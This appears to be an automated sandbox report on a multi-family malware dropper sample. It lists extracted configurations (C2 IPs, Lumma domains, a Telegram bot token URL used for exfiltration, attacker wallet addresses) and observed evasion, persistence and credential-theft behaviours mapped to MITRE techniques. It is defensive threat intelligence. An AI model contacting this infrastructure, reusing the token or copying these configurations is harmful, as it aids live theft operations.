amadey | 16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267

max time kernel
395s
max time network
304s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
26-11-2024 23:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4363463463464363463463463.exe
Size

10KB
MD5

2a94f3960c58c6e70826495f76d00b85
SHA1

e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
SHA256

2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
SHA512

fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
SSDEEP

192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Malware Config

Extracted

Family

nanocore

Version

1.2.2.0

91.92.240.41:7575

Mutex

7029ef73-6025-47e5-b0d0-fb5b27c261b8

Attributes

activate_away_mode
false
backup_connection_host
91.92.240.41
backup_dns_server
8.8.4.4
buffer_size
65535
build_time
2024-05-23T20:48:22.996317836Z
bypass_user_account_control
true
bypass_user_account_control_data
clear_access_control
false
clear_zone_identifier
false
connect_delay
4000
connection_port
7575
default_group
Default
enable_debug_mode
true
gc_threshold
1.048576e+07
keep_alive_timeout
30000
keyboard_logging
false
lan_timeout
2500
max_packet_size
1.048576e+07
mutex
7029ef73-6025-47e5-b0d0-fb5b27c261b8
mutex_timeout
5000
prevent_system_sleep
false
primary_connection_host
91.92.240.41
primary_dns_server
8.8.8.8
request_elevation
true
restart_delay
5000
run_delay
5000
run_on_startup
false
set_critical_process
true
timeout_interval
5000
use_custom_dns_server
false
version
1.2.2.0
wan_timeout
8000

Extracted

Family

lumma

https://powerful-avoids.sbs

https://motion-treesz.sbs

https://disobey-curly.sbs

https://leg-sate-boat.sbs

https://story-tense-faz.sbs

https://blade-govern.sbs

https://occupy-blushi.sbs

https://frogs-severz.sbs

https://property-imper.sbs

https://p3ar11fter.sbs

https://3xp3cts1aim.sbs

https://owner-vacat10n.sbs

https://peepburry828.sbs

https://p10tgrace.sbs

https://befall-sm0ker.sbs

https://librari-night.sbs

https://processhol.sbs

https://push-hook.cyou

https://crib-endanger.sbs

https://faintbl0w.sbs

Extracted

Family

amadey

Version

4.41

Botnet

fed3aa

http://185.215.113.16

Attributes

install_dir
44111dbc49
install_file
axplong.exe
strings_key
8d0ad6945b1a30a186ec2d30be6db0b5
url_paths
/Jo89Ku7d/index.php

rc4.plain

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

217.195.195.46:1604

Mutex

DcRatMutex_qwqdanchun

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

stealc

Botnet

valenciga

http://185.215.113.17

Attributes

url_path
/2fb6c2cc8dce150a.php

Extracted

Family

phorphiex

http://185.215.113.66/

http://91.202.233.141/

Wallets

0xCa90599132C4D88907Bd8E046540284aa468a035

TRuGGXNDM1cavQ1AqMQHG8yfxP4QWVSMN6

qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r

XryzFMFVpDUvU7famUGf214EXD3xNUSmQf

rsXCXBf9SagxV8JfC12d8Bybk84oPdMNN9

AULzfBuUAPfCGAXoG5Vq14aP9s6fx3AH4Z

LdgchXq1sKbAaAJ1EXAPSRBzLb8jnTZstT

MP8GEm8QpYgQYaMo8oM5NQhRBgDGiLZW5Q

4AtjkCVKbtEC3UEN77SQHuH9i1XkzNiRi5VCbA2XGsJh46nJSXfGQn4GjLuupCqmC57Lo7LvKmFUyRfhtJSvKvuw3h9ReKK

15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC

1BzmrjmKPKSR2hH5BeJySfiVA676E8DYaK

ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp

3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc

3ESHude8zUHksQg1h6hHmzY79BS36L91Yn

DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA

t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh

stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj

bnb1msyt0djx4ecspfxg5en0ye465kg3kmv9utzml2

bc1ppypcmu3684n648gyj62gjp2rw0xy7w3vwfamatlg29ajp4z52desafa0sr

bc1qc9edl4hzl9jyt8twdad3zjeh2df2znq96tdezd

Attributes

mutex
753f85d83d
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36

Extracted

Family

stealc

Botnet

default

http://91.202.233.158

Attributes

url_path
/e96ea2db21fa9a1b.php

Extracted

Family

stealc

Botnet

default_valenciga

http://185.215.113.17

Attributes

url_path
/2fb6c2cc8dce150a.php

Extracted

Family

lumma

https://blade-govern.sbs/api

https://story-tense-faz.sbs/api

https://push-hook.cyou/api

Extracted

Family

gurcu

https://api.telegram.org/bot7607027553:AAHrudQNbA23c1Me3ecFJGIJnQ0H1nBCp5Y/sendMessag

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat
BabbleLoader
BabbleLoader is a malware loader written in C++.
loader babbleloader
Babbleloader family
babbleloader

Detects BabbleLoader Payload 1 IoCs

resource	yara_rule
behavioral1/files/0x0007000000023cce-188.dat	family_babbleloader

Gurcu family
gurcu
Gurcu, WhiteSnake
Gurcu aka WhiteSnake is a malware stealer written in C#.
stealer gurcu
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
NanoCore
NanoCore is a remote access tool (RAT) with a variety of capabilities.
keylogger trojan stealer spyware nanocore
Nanocore family
nanocore
Njrat family
njrat
Phorphiex family
phorphiex

Phorphiex payload 1 IoCs

resource	yara_rule
behavioral1/files/0x0003000000023398-390.dat	family_phorphiex

Phorphiex, Phorpiex
Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.
worm trojan loader phorphiex
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral1/files/0x0009000000023ce1-223.dat	family_asyncrat

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	06981094fb.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	random.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
245	372	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 24 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2268	powershell.exe
3188	powershell.exe
3488	powershell.exe
1872	powershell.exe
2140	powershell.exe
2708	powershell.exe
1956	powershell.exe
4156	powershell.exe
936	powershell.exe
2864	powershell.exe
2116	powershell.exe
4016	powershell.exe
3884	powershell.exe
3600	powershell.exe
3244	powershell.exe
916	powershell.exe
1032	powershell.exe
2024	powershell.exe
3860	powershell.exe
372	powershell.exe
4992	powershell.exe
1708	powershell.exe
4316	powershell.exe
3364	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
3048	netsh.exe

Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs

persistence

Terminal Services DLL

T1505.005

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\x638368\Parameters\ServiceDll = "C:\\Windows\\System32\\x638368.dat"	reg.exe

Checks BIOS information in registry 2 TTPs 8 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	06981094fb.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	06981094fb.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	random.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	random.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	4363463463464363463463463.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	random.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	stealc_valenciga.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	axplong.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	AllNew.exe

Deletes itself 1 IoCs

pid	Process
5116	bav64.exe

Drops startup file 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b9584a316aeb9ca9b31edd4db18381f5.exe	bav64.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b9584a316aeb9ca9b31edd4db18381f5.exe	NJRat.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b9584a316aeb9ca9b31edd4db18381f5.exe	NJRat.exe
File opened for modification	\??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\b9584a316aeb9ca9b31edd4db18381f5.exe	taskmgr.exe

Executes dropped EXE 32 IoCs

pid	Process
4136	test9.exe
4216	Update.exe
4164	7mpPLxE.exe
2400	nano.exe
3640	peinf.exe
2996	7mpPLxE.exe
1668	feb9sxwk.exe
2332	curlapp64.exe
3428	printui.exe
2732	random.exe
2728	major.exe
2760	axplong.exe
1036	NJRat.exe
1700	w.exe
1468	stealc_valenciga.exe
3488	pp.exe
684	3232512144.exe
984	sysnldcvmr.exe
1940	needmoney.exe
4784	svchost015.exe
868	axplong.exe
2728	stealc_default2.exe
1640	aqbjn3fl.exe
3300	aqbjn3fl.exe
1480	06981094fb.exe
876	console_zero.exe
5116	bav64.exe
888	AllNew.exe
3344	Gxtuum.exe
2904	kxfh9qhs.exe
1536	crypti.exe
1636	peinf.exe

Identifies Wine through registry keys 2 TTPs 4 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine	06981094fb.exe
Key opened	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine	random.exe

Loads dropped DLL 20 IoCs

pid	Process
2332	curlapp64.exe
2332	curlapp64.exe
3428	printui.exe
1468	stealc_valenciga.exe
1468	stealc_valenciga.exe
3428	printui.exe
4784	svchost015.exe
4784	svchost015.exe
2584	svchost.exe
2584	svchost.exe
2584	svchost.exe
2584	svchost.exe
2584	svchost.exe
2584	svchost.exe
2584	svchost.exe
2584	svchost.exe
2584	svchost.exe
2584	svchost.exe
876	console_zero.exe
876	console_zero.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\b9584a316aeb9ca9b31edd4db18381f5 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Files\\NJRat.exe\" .."	NJRat.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe"	3232512144.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\curlapp64 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Files\\curlapp64.exe"	curlapp64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\DHCP Host = "C:\\Program Files (x86)\\DHCP Host\\dhcphost.exe"	nano.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b9584a316aeb9ca9b31edd4db18381f5 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Files\\NJRat.exe\" .."	NJRat.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	nano.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs

Web Service

T1102

flow	ioc
108	raw.githubusercontent.com
320	raw.githubusercontent.com
322	raw.githubusercontent.com
328	raw.githubusercontent.com
330	raw.githubusercontent.com
336	raw.githubusercontent.com
107	raw.githubusercontent.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
282	ipinfo.io
283	ipinfo.io

Network Service Discovery 1 TTPs 2 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
4648	cmd.exe
2992	ARP.EXE

Drops file in System32 directory 26 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	\??\c:\windows\system32\winsvcf\winlogsvc	svchost.exe
File created	C:\Windows\System32\libcurl.dll	printui.exe
File created	C:\Windows\System32\zlib1.dll	printui.exe
File created	C:\Windows\System32\ucrtbased.dll	printui.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\System32\libwinpthread-1.dll	printui.exe
File created	C:\Windows\System32\console_zero.exe	printui.exe
File created	C:\Windows\System32\vcruntime140d.dll	printui.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\System32\svcldr64.dat	printui.exe
File created	C:\Windows\System32\libcrypto-3-x64.dll	printui.exe
File created	C:\Windows\System32\libiconv-2.dll	printui.exe
File created	C:\Windows\System32\libintl-9.dll	printui.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	\??\c:\windows\system32\winsvcf\WinRing0x64.sys	svchost.exe
File created	C:\Windows\System32\winsvcf\winlogsvc	printui.exe
File created	C:\Windows\System32\libssl-3-x64.dll	printui.exe
File created	C:\Windows\System32\x638368.dat	printui.exe
File created	\??\c:\windows\system32\winsvcf\x555263.dat	svchost.exe
File created	\??\c:\windows\system32\crypti.exe	svchost.exe
File opened for modification	\??\c:\windows\system32\crypti.exe	svchost.exe
File created	C:\Windows\System32\libpq.dll	printui.exe
File created	C:\Windows\System32\bav64.exe	printui.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File created	\??\c:\windows\system32\winsvcf\x187941.dat	svchost.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

pid	Process
2732	random.exe
2760	axplong.exe
868	axplong.exe
1480	06981094fb.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 4164 set thread context of 2996	4164	7mpPLxE.exe	100
PID 1940 set thread context of 4784	1940	needmoney.exe	155
PID 1640 set thread context of 3300	1640	aqbjn3fl.exe	171

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\DHCP Host\dhcphost.exe	nano.exe
File opened for modification	C:\Program Files (x86)\DHCP Host\dhcphost.exe	nano.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\axplong.job	random.exe
File created	C:\Windows\sysnldcvmr.exe	3232512144.exe
File opened for modification	C:\Windows\sysnldcvmr.exe	3232512144.exe
File created	C:\Windows\Tasks\Gxtuum.job	AllNew.exe

Launches sc.exe 2 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1112	sc.exe
4960	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Embeds OpenSSL 1 IoCs

Embeds OpenSSL, may be used to circumvent TLS interception.

resource	yara_rule
behavioral1/files/0x0003000000000737-564.dat	embeds_openssl

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Program crash 2 IoCs

pid	pid_target	Process	procid_target
2228	2996	WerFault.exe	100
4696	2996	WerFault.exe	100

System Location Discovery: System Language Discovery 1 TTPs 27 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	06981094fb.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7mpPLxE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aqbjn3fl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	stealc_default2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	peinf.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7mpPLxE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	axplong.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	stealc_valenciga.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	random.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	axplong.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	peinf.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3232512144.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	needmoney.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aqbjn3fl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Gxtuum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	kxfh9qhs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Update.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sysnldcvmr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AllNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nano.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NJRat.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	stealc_valenciga.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	stealc_valenciga.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost015.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	svchost015.exe

Delays execution with timeout.exe 6 IoCs

evasion

pid	Process
3608	timeout.exe
1112	timeout.exe
5080	timeout.exe
3048	timeout.exe
2040	timeout.exe
4116	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
